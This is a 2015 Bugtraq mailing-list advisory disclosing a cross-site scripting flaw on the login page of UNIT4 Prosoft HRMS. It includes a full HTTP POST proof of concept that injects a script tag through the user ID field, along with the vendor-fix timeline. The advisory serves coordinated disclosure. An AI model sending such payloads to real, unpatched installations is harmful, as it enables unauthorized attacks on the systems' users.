lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 13 Feb 2015 16:05:57 GMT
From: jerold@...d00sec.com
To: bugtraq@...urityfocus.com
Subject: UNIT4 Prosoft HRMS XSS Vulnerability

# Vulnerability type: Cross-site Scripting
# Vendor: http://www.unit4.com/
# Product: UNIT4 Prosoft HRMS
# Product site: http://www.unit4apac.com/products/prosofthrms
# Affected version: 8.14.230.47
# Fixed version: 8.14.330.43
# Credit: Jerold Hoong & Edric Teo

# PROOF OF CONCEPT

The login page of UNIT4's Prosoft HRMS is vulnerable to cross-site scripting.

POST /Login.aspx?ReturnUrl=%2fCommon%2fBroadcastMessageDisplay.aspx%3fUrlReferrerCode
%3d&UrlReferrerCode HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=teuq5d45e53ecg45mzptyv55
Host: 127.0.0.1
Content-Length: 1276
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-SG

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjAyNzEwNDEyOQ9kFgQCAQ9
kFgICAQ8WAh4EVGV4dAVfPGxpbmsgcmVsPSJTSE9SVENVVCBJQ09OIiBocmVmPSJBcHBfVGhlbWVzL1BTRGV
mYXVsdC9JbWFnZXMvRmF2SWNvbi5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiIgLz5kAgMPZBYKAgEPZBYCAgMP
DxYCHgdWaXNpYmxlaGRkAgMPZBYCZg8PFgIfAAU0VGhlIGNvZGUgY29udGFpbnMgaW52YWxpZCBjaGFyYWN
0ZXJzLiAoVVNSLlVzZXJDb2RlKWRkAgUPDxYCHwAFBlY4IFVBVGRkAgcPZBYWAgEPZBYEAgEPDxYCHwAFC0
NsaWVudCBDb2RlZGQCBQ8PFgIeDEVycm9yTWVzc2FnZQUIUmVxdWlyZWRkZAIDD2QWBAIBDw8WAh8ABQ
ZTZXJ2ZXJkZAIDDxBkZBYAZAIFD2QWBAIBDw8WAh8ABQhEYXRhYmFzZWRkAgUPDxYCHwIFCFJlcXVpcmV
kZGQCBw9kFgQCAQ8PFgIfAAULTERBUCBEb21haW5kZAIDDxBkZBYAZAIJDw8WAh8ABQdVc2VyIElEZGQCCw
8PZBYCHgxhdXRvY29tcGxldGUFA29mZmQCDQ8PFgIfAgUIUmVxdWlyZWRkZAIPDw8WAh8ABQhQYXNzd29yZ
GRkAhMPDxYCHwFoZBYEAgEPDxYCHwAFCExhbmd1YWdlZGQCAw8QZGQWAGQCFQ8PFgIfAAUVRm9yZ290I
HlvdXIgcGFzc3dvcmQ%2FZGQCFw8PFgYfAAUHU2lnbiBJbh4EXyFTQgKAAh4FV2lkdGgbAAAAAADAUkABAAAA
ZGQCCw9kFgJmD2QWBAIDDxYCHwAFQkNvcHlyaWdodCDCqSAyMDExIFVOSVQ0IEFzaWEgUGFjaWZpYyBQd
GUgTHRkLiBBbGwgUmlnaHRzIFJlc2VydmVkLmQCBQ8WAh8ABRNWZXJzaW9uIDguMTQuMzMwLjQzZGSwnj3
yxmGDZ9jR0wKr5HZldmVj4w%3D%3D&__EVENTVALIDATION=%2FwEWBQLctJOuBALT8dy8BQK1qbSRCwL
WxaLXDALD94uUBwZOBjPAY1F7DZ4L5a8tZ4BpX9CW&txtUserID=%22%3E%3Cscript%3Ealert%281%29%3B%3
C%2Fscript%3E&txtPassword=&btnSignIn=Sign+In

# TIMELINE
– 28/10/2014: Vulnerability found
– 04/11/2014: Vendor informed
– 04/11/2014: Vendor responded
– 30/11/2014: Vendor fixed the issue
– 14/02/2015: Public disclosure

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ